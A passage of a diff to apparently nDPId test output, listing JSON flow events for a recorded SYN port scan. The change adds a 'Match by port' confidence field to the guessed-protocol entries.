 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00592{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":554,"l4_proto":"tcp","ndpi": {"proto":"RTSP","breed":"Fun","category":"Media"}}
+00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":554,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RTSP","breed":"Fun","category":"Media"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00603{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2604,"l4_proto":"tcp","ndpi": {"proto":"OSPF","breed":"Acceptable","category":"Network"}}
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2604,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"OSPF","breed":"Acceptable","category":"Network"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6699,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6699,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00604{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1058,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2604,"l4_proto":"tcp","ndpi": {"proto":"OSPF","breed":"Acceptable","category":"Network"}}
+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1058,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2604,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"OSPF","breed":"Acceptable","category":"Network"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1058,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00601{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2605,"l4_proto":"tcp","ndpi": {"proto":"BGP","breed":"Acceptable","category":"Network"}}
+00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"BGP","breed":"Acceptable","category":"Network"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00601{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2605,"l4_proto":"tcp","ndpi": {"proto":"BGP","breed":"Acceptable","category":"Network"}}
+00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"BGP","breed":"Acceptable","category":"Network"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2607,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -6370,9 +6370,9 @@
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33354,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00593{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","ndpi": {"proto":"SMTPS","breed":"Safe","category":"Email"}}
+00629{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}}
 00569{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00594{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","ndpi": {"proto":"SMTPS","breed":"Safe","category":"Email"}}
+00630{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2638,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2638,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -6776,9 +6776,9 @@
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":873,"l4_proto":"tcp","ndpi": {"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":873,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":873,"l4_proto":"tcp","ndpi": {"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":873,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}}
